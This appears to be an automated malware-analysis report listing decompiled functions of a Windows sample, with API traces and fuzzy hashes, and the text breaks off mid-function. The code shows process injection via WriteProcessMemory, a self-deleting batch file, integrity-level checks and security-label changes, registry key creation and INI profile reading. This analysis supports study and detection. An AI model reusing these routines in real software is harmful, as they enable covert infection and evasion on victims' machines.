    				_t25 =  *0x422544; // 0x400000
    				_t26 = E0041631A(_t25, __edi);
    				_v12 = _t26;
    				if(_t26 != 0) {
    					_v5 = 0;
    					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
    						_v5 = 1;
    					}
    					_t29 =  *0x422530; // 0x1
    					_a8 = _a8 | _t29 & 0x00000014;
    					_push(_t52);
    					if(WriteProcessMemory(_t51, 0x422530 -  *0x422544 + _v12,  &_a8, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(WriteProcessMemory(_t51, 0x422544 -  *0x422544 + _v12,  &_v12, 4, 0) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(E00405B5B(0x4229f4, _t51, _v12,  *0x4229f4) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(E00405B5B(0x4229f8, _t51, _v12,  *0x4229f8) == 0) {
    						_v5 = _v5 + 1;
    					}
    					if(_v5 == 0) {
    						_t43 = _v12;
    					} else {
    						VirtualFreeEx(_t51, _v12, 0, 0x8000);
    						goto L1;
    					}
    				} else {
    					L1:
    					_t43 = 0;
    				}
    				return _t43;
    			}












    APIs
      • Part of subcall function 0041631A: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000), ref: 00416336
    • DuplicateHandle.KERNEL32(000000FF,7519F560,00000000,7519F560,00000000,00000000,00000002,00000000,00000000,?,?,?,00419FBF,?,00000000,?), ref: 004063BA
    • WriteProcessMemory.KERNEL32(00000000,7519F560,?,00000004,00000000,?,?,?,?,00419FBF,?,00000000,?,?,0041A157,?), ref: 004063F1
    • WriteProcessMemory.KERNEL32(00000000,7519F560,7519F560,00000004,00000000,?,?,?,00419FBF,?,00000000,?,?,0041A157,?,?), ref: 00406411
    • VirtualFreeEx.KERNEL32(00000000,7519F560,00000000,00008000,00000000,7519F560,00000000,7519F560,?,?,00419FBF,?,00000000,?,?,0041A157), ref: 00406460
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
    • String ID: 0%B$D%B
    • API String ID: 2215616122-1757350062
    • Opcode ID: 3787fb974981f2b70e3e0f55bf623ed7e5146db896bf8aa4e8c88e8ce1d1a38d
    • Instruction ID: 01a922300506ea6c5ab3b5131195605b11fba08655effd1393a200d93604b8a1
    • Opcode Fuzzy Hash: 3787fb974981f2b70e3e0f55bf623ed7e5146db896bf8aa4e8c88e8ce1d1a38d
    • Instruction Fuzzy Hash: 4F21B4B2604109BEDB059BA4DE80EAF7F78FB05348F4040A9FA02F2190D3759A569B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E00413481(void* __ebx, void* __edi, char _a4) {
    				short _v24;
    				intOrPtr _v28;
    				char _v72;
    				short _v592;
    				char _v852;
    				char _v1392;
    				void* _t35;
    				char _t56;
    
    				if(E00416D3D(L"bat",  &_v592) == 0) {
    					L7:
    					return 0;
    				}
    				CharToOemW( &_v592,  &_v852);
    				_push( &_v852);
    				if(E00412785( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
    					L6:
    					E00416D1C( &_v592);
    					goto L7;
    				}
    				_t35 = E00416B71( &_v592, _a4, _t31);
    				E004119C1(_a4);
    				if(_t35 == 0) {
    					goto L6;
    				}
    				_push(__edi);
    				_push( &_v592);
    				if(E004126B4( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
    					goto L6;
    				} else {
    					_t56 = 0x44;
    					E00411A74( &_v72,  &_v72, 0, _t56);
    					_v24 = 0;
    					_v72 = _t56;
    					_v28 = 1;
    					return E00413288( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
    				}
    			}












    APIs
      • Part of subcall function 00416D3D: GetTempPathW.KERNEL32(000000F6,?), ref: 00416D54
    • CharToOemW.USER32 ref: 004134B1
      • Part of subcall function 00416B71: CreateFileW.KERNEL32(0041349B,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416B8B
      • Part of subcall function 00416B71: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416BAE
      • Part of subcall function 00416B71: CloseHandle.KERNEL32(00000000,?,00416DB0,0041349B,00000000,00000000,0041349B,?), ref: 00416BBB
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00413535
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
    • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
    • API String ID: 1639923935-3344086482
    • Opcode ID: 2a949d606d81404b6edebe0c01d2ad3e6a227870b73206377bd154142bd678df
    • Instruction ID: 580b86592ac0efda2edcca50b213219deb23159d4e27520885909aa01ebb0f50
    • Opcode Fuzzy Hash: 2a949d606d81404b6edebe0c01d2ad3e6a227870b73206377bd154142bd678df
    • Instruction Fuzzy Hash: DF21E1B19011087ADF10DFA5DC46FEE77BCEB04705F2045A7B608E20A1D6799BC98F68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00407257(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				long _v12;
    				void* _v16;
    				char _v32;
    				void _v360;
    				short _v880;
    				void* __edi;
    				void* __esi;
    				void* _t18;
    				void* _t25;
    				void* _t26;
    				long _t39;
    				void* _t42;
    				void* _t44;
    				long _t47;
    
    				_t48 =  &_v32;
    				_t18 = 0x2b;
    				_v16 = __edx;
    				_t44 = __ecx;
    				E00419DD3(_t18,  &_v32);
    				if(E00417246(_t48,  &_v880, _t44) == 0) {
    					L11:
    					return 1;
    				}
    				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
    				_v8 = _t25;
    				if(_t25 == 0xffffffff) {
    					goto L11;
    				}
    				_t26 = 0x30;
    				_t39 = 0;
    				E00419D9D(_t26,  &_v360);
    				_t9 =  &_v8; // 0x40723f
    				if(WriteFile( *_t9,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
    					L9:
    					FlushFileBuffers(_v8);
    					CloseHandle(_v8);
    					if(_t39 == 0) {
    						E00416D1C( &_v880);
    					}
    					goto L11;
    				} else {
    					_t42 = _v16;
    					if(_t42 == 0) {
    						L7:
    						_t39 = 1;
    						goto L9;
    					}
    					_t47 = E004124FE(_t42);
    					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
    						_t39 = 0;
    						goto L9;
    					} else {
    						goto L7;
    					}
    				}
    			}



















    APIs
      • Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 004072A2
    • WriteFile.KERNEL32(?r@,?,00000146,?,00000000,00000000), ref: 004072E0
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407304
    • FlushFileBuffers.KERNEL32(?), ref: 00407318
    • CloseHandle.KERNEL32(?), ref: 00407321
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
    • String ID: ?r@
    • API String ID: 2459967240-3148030299
    • Opcode ID: 50779079251e561cf9c7c8349911c5d865ba7c7cf1d13a1133d9eb47232162b2
    • Instruction ID: 9fae522ab24e864a6ecf1725ba9aa54ca90a210a817ea25853a11c88e25380f5
    • Opcode Fuzzy Hash: 50779079251e561cf9c7c8349911c5d865ba7c7cf1d13a1133d9eb47232162b2
    • Instruction Fuzzy Hash: 9F21AC32D40218BBEF209BA19D05FDF7BBDAB84750F1040A6B900F31A0D779AE45DAA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00413115(void* __ecx) {
    				long _v8;
    				void* _v12;
    				char* _t21;
    				signed char _t22;
    				DWORD* _t25;
    				void* _t32;
    
    				_t28 = 0;
    				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
    					L14:
    					return _t28;
    				}
    				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
    					L13:
    					CloseHandle(_v12);
    					goto L14;
    				} else {
    					_t32 = E00411991(_v8);
    					if(_t32 == 0) {
    						L12:
    						goto L13;
    					}
    					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
    						_t21 = GetSidSubAuthorityCount( *_t32);
    						if(_t21 != 0) {
    							_t22 =  *_t21;
    							if(_t22 > 0) {
    								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
    								if(_t25 != 0) {
    									if( *_t25 >= 0x2000) {
    										asm("sbb bl, bl");
    										_t28 = 3;
    									} else {
    										_t28 = 1;
    									}
    								}
    							}
    						}
    					}
    					E004119C1(_t32);
    					goto L12;
    				}
    			}










    APIs
    • OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 00413125
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,75144EE0,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 00413145
    • GetLastError.KERNEL32(?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 0041314B
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 00413172
    • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 0041317A
    • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 00413191
    • CloseHandle.KERNEL32(?,?,?,?,00405C4E,00000000,00406128,?,?,00000000), ref: 004131BC
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
    • String ID:
    • API String ID: 3714493844-0
    • Opcode ID: 8e5feec0317939b35c32eaaf485a17ff5ccc2a9711f792394a86efa33b69d241
    • Instruction ID: 1252fea863ed61440a813894d2ba782221bc3edd722287188d7490a8aaaf3a04
    • Opcode Fuzzy Hash: 8e5feec0317939b35c32eaaf485a17ff5ccc2a9711f792394a86efa33b69d241
    • Instruction Fuzzy Hash: A9118E76500048BFEB105FA0DD84EEE3B7EEB05341F1804A6F541E6264D7399FCAAB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415EDB(short* _a4) {
    				char _v5;
    				int _v12;
    				void* _v16;
    				void* _v20;
    				int _v24;
    				long _t18;
    
    				_v5 = 0;
    				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
    				_t33 = _t18;
    				if(_t18 == 0) {
    					_v12 = 0;
    					do {
    						E00415D40(6, 4, _t33, 2, _a4);
    						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
    							goto L4;
    						} else {
    							RegCloseKey(_v20);
    							if(_v24 == 1) {
    								_v5 = 1;
    							} else {
    								goto L4;
    							}
    						}
    						L7:
    						RegCloseKey(_v16);
    						goto L8;
    						L4:
    						_v12 = _v12 + 1;
    					} while (_v12 < 0x64);
    					goto L7;
    				}
    				L8:
    				return _v5;
    			}










    APIs
    • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00415F03
      • Part of subcall function 00415D40: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00415E61
    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 00415F35
    • RegCloseKey.ADVAPI32(?), ref: 00415F3E
    • RegCloseKey.ADVAPI32(?), ref: 00415F58
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseCreate$CharUpper
    • String ID: SOFTWARE\Microsoft$d
    • API String ID: 1794619670-1227932965
    • Opcode ID: 1b945b6785a0340042813f9f4e3ccb090da9db43e6af1e3be1ce8049c93ad776
    • Instruction ID: 57cfeeb4bbbfe6b278825c05152b457a591863e3a8ff1f1037bc0623e8b41536
    • Opcode Fuzzy Hash: 1b945b6785a0340042813f9f4e3ccb090da9db43e6af1e3be1ce8049c93ad776
    • Instruction Fuzzy Hash: F7116DB190420CFEEB119B94DD80EFFBBBCEB54388F104066FA01B6161D2759E868B75
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040AE98(WCHAR* __ebx, void* __ecx, char _a4) {
    				void* __edi;
    				long _t3;
    				WCHAR* _t13;
    
    				_t13 = __ebx;
    				if( *0x422a70 == 0) {
    					E0040666E(__ecx, 0x422a70, 2);
    					 *((short*)(E004119FD(0x422c78, 0x422a70, E00412510(0x422a70) + _t10) + 0x422c78)) = 0;
    					_t3 = PathRemoveFileSpecW(0x422c78);
    				}
    				if(_t13 != 0) {
    					E00411D62(_t3 | 0xffffffff, 0x422a70, _t13);
    					_t3 = PathRenameExtensionW(_t13, L".tmp");
    				}
    				if(_a4 != 0 &&  *0x42279c > 1) {
    					E00416FC8(0x422c78);
    					E00415042(0x422c78);
    					_t3 = GetFileAttributesW(0x422a70);
    					if(_t3 != 0xffffffff) {
    						return E00415042(0x422a70);
    					}
    				}
    				return _t3;
    			}







    APIs
    • PathRemoveFileSpecW.SHLWAPI(00422C78,00422C78,00422A70,00000000,00000002,00000000,00020000,0040B992,00000001,?,8793AEF2,00000002,00002723,00020000,?,00002722), ref: 0040AED0
    • PathRenameExtensionW.SHLWAPI(00000000,.tmp,00000000,00020000,0040B992,00000001,?,8793AEF2,00000002,00002723,00020000,?,00002722,00020000,00000001,?), ref: 0040AEEC
    • GetFileAttributesW.KERNEL32(00422A70,00422C78,00422C78,00000000,00020000,0040B992,00000001,?,8793AEF2,00000002,00002723,00020000,?,00002722,00020000,00000001), ref: 0040AF0F
      • Part of subcall function 0040666E: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422590,00000000,00000032,?,77A19EB0,00000000), ref: 004066E7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$ExtensionFileRename$AttributesRemoveSpec
    • String ID: .tmp$p*B$x,B
    • API String ID: 3627892477-3516233856
    • Opcode ID: 1c9e69087c3751f3fa60162d53a5b02ba895a09164c93f05d6bb019f03c9f947
    • Instruction ID: 6f33a774a54f4f11c4d66001c6319bbb00c3cd0d6b002a74c489e92638f2621d
    • Opcode Fuzzy Hash: 1c9e69087c3751f3fa60162d53a5b02ba895a09164c93f05d6bb019f03c9f947
    • Instruction Fuzzy Hash: 17F0AD71B0421035E2203736AC4AABF29598F92728F44867FF021B11E2CFBC4C92826E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E00415042(intOrPtr _a4) {
    				struct _ACL* _v8;
    				struct _SECURITY_DESCRIPTOR* _v12;
    				int _v16;
    				int _v20;
    				void** _t11;
    				int _t16;
    				struct _ACL* _t18;
    
    				_t18 = 0;
    				E0041308D(L"SeSecurityPrivilege");
    				_t11 =  &_v12;
    				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
    				if(_t11 != 0) {
    					_v8 = 0;
    					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
    					if(_t16 != 0) {
    						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
    						if(_t16 == 0) {
    							_t18 = 1;
    						}
    					}
    					LocalFree(_v12);
    				}
    				return _t18;
    			}











    APIs
      • Part of subcall function 0041308D: GetCurrentThread.KERNEL32 ref: 0041309D
      • Part of subcall function 0041308D: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130A4
      • Part of subcall function 0041308D: OpenProcessToken.ADVAPI32(000000FF,00000020,0041C599,?,?,?,?,0041C599,SeTcbPrivilege), ref: 004130B6
    • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00415061
    • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 0041507D
    • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 00415094
    • LocalFree.KERNEL32(00000000), ref: 004150A3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
    • String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
    • API String ID: 3555451682-1937014404
    • Opcode ID: b7034957f4b360ddc47b122f38c3a6483de68978fec94b95b28f8777ae4260a0
    • Instruction ID: 3086d2c10367922c049588a3464c6c2a4d30f3ee716e3989c2044df014a0aeec
    • Opcode Fuzzy Hash: b7034957f4b360ddc47b122f38c3a6483de68978fec94b95b28f8777ae4260a0
    • Instruction Fuzzy Hash: D2011DB564020CFFEB119FE18D85FEF7BBCAB04744F004466B501F11A1D6B69A949A68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E004084BE(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
    				long _v8;
    				void* __ebx;
    				void* __esi;
    				signed int _t47;
    				signed short _t58;
    				int _t65;
    				signed int _t66;
    				signed short _t75;
    				void* _t79;
    
    				_t70 = __ecx;
    				_push(__ecx);
    				_t75 = _a16;
    				_t79 = __eax;
    				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
    					_t65 = GetAncestor(_a4, 2);
    					if(_t65 ==  *(_t79 + 0x170)) {
    						goto L8;
    					}
    					_t70 = _a12 & 0x0000ffff;
    					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
    					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
    						 *(_t79 + 0x170) = _t65;
    						goto L8;
    					} else {
    						goto L35;
    					}
    				} else {
    					L8:
    					_t66 = _a12 & 0x0000ffff;
    					_v8 = _t66;
    					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
    					if(_a12 != 1) {
    						_t47 = E004083DF(_t70, _t79, _a4, _a20);
    						_a20 = _t47;
    						__eflags = _t66 - 8;
    						if(__eflags > 0) {
    							__eflags = _t66 - 9;
    							if(__eflags == 0) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									__eflags = _t47 - 0xa5;
    									if(_t47 != 0xa5) {
    										L35:
    										return _t47;
    									}
    									_t47 = 0xffff;
    									L59:
    									__eflags = _t47;
    									if(_t47 == 0) {
    										goto L35;
    									}
    									__eflags = _t47 - 0xffff;
    									if(_t47 != 0xffff) {
    										L33:
    										_push(_a28);
    										_push(_t47 & 0x0000ffff);
    										_push(0x112);
    										L34:
    										_t47 = PostMessageW(_a4, ??, ??, ??);
    										goto L35;
    									}
    									L61:
    									_push(_a28);
    									_push(_a4);
    									_push(0x7b);
    									goto L34;
    								}
    								_t47 =  *(_a8 + 0x24);
    								__eflags = _t47 & 0x00010000;
    								if((_t47 & 0x00010000) == 0) {
    									goto L35;
    								}
    								asm("sbb eax, eax");
    								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
    								goto L59;
    							}
    							if(__eflags <= 0) {
    								L25:
    								_push(_a28);
    								_push(_t66);
    								L10:
    								_push(_t47);
    								goto L34;
    							}
    							__eflags = _t66 - 0x11;
    							if(_t66 <= 0x11) {
    								L40:
    								__eflags = _t47 - 0xa1;
    								if(_t47 == 0xa1) {
    									_t47 = E0040824F(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
    								}
    								goto L35;
    							}
    							__eflags = _t66 - 0x14;
    							if(_t66 == 0x14) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									L21:
    									__eflags = _t47 - 0xa5;
    									L22:
    									if(__eflags != 0) {
    										goto L35;
    									}
    									goto L61;
    								}
    								L32:
    								_t47 = 0xf060;
    								goto L33;
    							}
    							__eflags = _t66 - 0x15;
    							if(_t66 != 0x15) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = 0xf180;
    							goto L33;
    						}
    						if(__eflags == 0) {
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = _a8;
    							__eflags =  *(_t47 + 0x24) & 0x00020000;
    							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
    								goto L35;
    							}
    							_t47 = 0xf020;
    							goto L33;
    						}
    						__eflags = _t66 - 2;
    						if(_t66 == 2) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 == 0xa3) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa5;
    							if(_t47 == 0xa5) {
    								goto L61;
    							}
    							goto L40;
    						}
    						__eflags = _t66 - 3;
    						if(_t66 == 3) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 != 0xa3) {
    								__eflags = _t47 - 0xa5;
    								if(_t47 == 0xa5) {
    									goto L61;
    								}
    								__eflags = _t47 - 0xa1;
    								goto L22;
    							}
    							goto L32;
    						}
    						__eflags = _t66 - 5;
    						if(_t66 == 5) {
    							__eflags = _t47 - 0xa1;
    							if(_t47 != 0xa1) {
    								__eflags = _t47 - 0xa0;
    								if(_t47 != 0xa0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0xfffffffe);
    								L28:
    								_push( *((intOrPtr*)(_t79 + 8)));
    								goto L34;
    							}
    							_push(0);
    							_push(0xffffffff);
    							goto L28;
    						}
    						__eflags = _t66 - 6 - 1;
    						if(_t66 - 6 > 1) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa1;
    						if(_t47 == 0xa1) {
    							E0040824F(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
    							_t47 = _a20;
    							_t66 = _v8;
    							goto L25;
    						}
    						__eflags = _t47 - 0xa2;
    						if(_t47 == 0xa2) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa3;
    						if(_t47 == 0xa3) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa0;
    						if(_t47 == 0xa0) {
    							goto L25;
    						}
    						goto L21;
    					}
    					_t58 = E0041AA9C(0, _t79, 0);
    					_push(_a24);
    					_push(_t58 & 0x0000ffff);
    					_t47 = E004083DF(_t79, _t79, _a4, _a16);
    					goto L10;
    				}
    			}













    APIs
    • GetAncestor.USER32(?,00000002), ref: 004084E7
    • SendMessageTimeoutW.USER32 ref: 00408512
    • PostMessageW.USER32(?,00000020,?,00000000), ref: 00408554
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 004085EA
    • PostMessageW.USER32(?,00000112,?,?), ref: 0040863D
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040867C
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
    • String ID:
    • API String ID: 1223205383-0
    • Opcode ID: 51a72d6c581778da24983603807bf5d1c281b7b4912517c2fe85e87477d58076
    • Instruction ID: 5709bc8453ff45ba8f042624d161fdb7cd2d968acf725209ee55610a2e3e96b1
    • Opcode Fuzzy Hash: 51a72d6c581778da24983603807bf5d1c281b7b4912517c2fe85e87477d58076
    • Instruction Fuzzy Hash: 13518070600219AAEF304A14CF85BBF3654E715394F25083FF9C1B62E1CE7ECD91AA5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0040E41C(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				short _v524;
    				short _v528;
    				char _v568;
    				short _v584;
    				char _v596;
    				short _v600;
    				char _v608;
    				short _v612;
    				char _v616;
    				short _v620;
    				char _v624;
    				short _v628;
    				short* _v632;
    				WCHAR* _v636;
    				WCHAR* _v640;
    				WCHAR* _v644;
    				WCHAR* _v648;
    				WCHAR* _v652;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t54;
    				WCHAR* _t57;
    				void* _t61;
    				void* _t63;
    				void* _t65;
    				void* _t67;
    				void* _t69;
    				WCHAR* _t72;
    				WCHAR* _t74;
    				long _t78;
    				int _t81;
    				long _t85;
    				long _t88;
    				WCHAR* _t89;
    				void* _t90;
    				WCHAR* _t94;
    				WCHAR* _t95;
    				WCHAR* _t111;
    				WCHAR* _t112;
    				WCHAR* _t117;
    				intOrPtr _t126;
    				signed int _t127;
    				void* _t129;
    
    				_t129 = (_t127 & 0xfffffff8) - 0x284;
    				if(E00417246( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L21:
    					return 1;
    				}
    				_t132 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_t117 = E00411991(0x1fffe);
    					_v628 = _t117;
    					__eflags = _t117;
    					if(_t117 == 0) {
    						goto L21;
    					}
    					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
    					__eflags = _t54;
    					if(_t54 <= 0) {
    						L20:
    						E004119C1(_t117);
    						goto L21;
    					}
    					_t9 =  &(_t54[0]); // 0x1
    					_t57 = E00412871(_t117, _t9);
    					__eflags = _t57;
    					if(_t57 == 0) {
    						goto L20;
    					}
    					_t111 = E00411991(0xc1c);
    					_v640 = _t111;
    					__eflags = _t111;
    					if(_t111 != 0) {
    						_t11 =  &(_t111[0x2fd]); // 0x5fa
    						_v632 = _t11;
    						_v644 = _t117;
    						_t61 = 0x72;
    						E00419DD3(_t61,  &_v584);
    						_t63 = 0x73;
    						E00419DD3(_t63,  &_v596);
    						_t65 = 0x74;
    						E00419DD3(_t65,  &_v608);
    						_t67 = 0x75;
    						E00419DD3(_t67,  &_v624);
    						_t69 = 0x76;
    						E00419DD3(_t69,  &_v616);
    						goto L9;
    						L18:
    						_t74 = E004128AD(_v648, 1);
    						_v652 = _t74;
    						__eflags = _t74;
    						if(_t74 != 0) {
    							_t111 = _v644;
    							L9:
    							_t72 = StrStrIW(_v644,  &_v584);
    							__eflags = _t72;
    							if(_t72 == 0) {
    								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
    								__eflags = _t78;
    								if(_t78 != 0) {
